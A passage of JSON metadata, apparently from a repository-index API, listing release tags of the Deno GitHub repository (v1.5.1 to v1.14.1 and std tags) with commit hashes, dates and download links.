name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/ho